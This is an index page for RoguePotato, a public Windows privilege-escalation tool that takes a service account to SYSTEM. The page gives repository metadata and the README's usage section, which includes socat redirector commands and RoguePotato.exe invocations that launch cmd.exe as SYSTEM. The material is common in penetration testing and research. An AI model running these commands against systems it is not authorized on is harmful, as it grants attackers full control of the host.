Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/antonioCoco/RoguePotato
Another Windows Local Privilege Escalation from Service Account to System
https://github.com/antonioCoco/RoguePotato
Last synced: 3 months ago
JSON representation
Another Windows Local Privilege Escalation from Service Account to System
- Host: GitHub
- URL: https://github.com/antonioCoco/RoguePotato
- Owner: antonioCoco
- License: gpl-3.0
- Created: 2020-05-10T17:38:28.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-01-09T20:43:07.000Z (almost 4 years ago)
- Last Synced: 2024-04-12T18:04:27.711Z (7 months ago)
- Language: C
- Homepage:
- Size: 183 KB
- Stars: 959
- Watchers: 18
- Forks: 126
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-rainmana - antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System (C)
- awesome-hacking-lists - antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System (C)
README
# RoguePotato
Just another Windows Local Privilege Escalation from Service Account to System. Full details at --> https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
## Usage
```
RoguePotato
@splinter_code & @decoder_itMandatory args:
-r remote_ip: ip of the remote machine to use as redirector
-e commandline: commandline of the program to launchOptional args:
-l listening_port: This will run the RogueOxidResolver locally on the specified port
-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)
-z : this flag will randomize the pipename_placeholder (don't use with -p)Examples:
- Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
- RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
- RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
- RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
```## Demo
![demo](demo.png)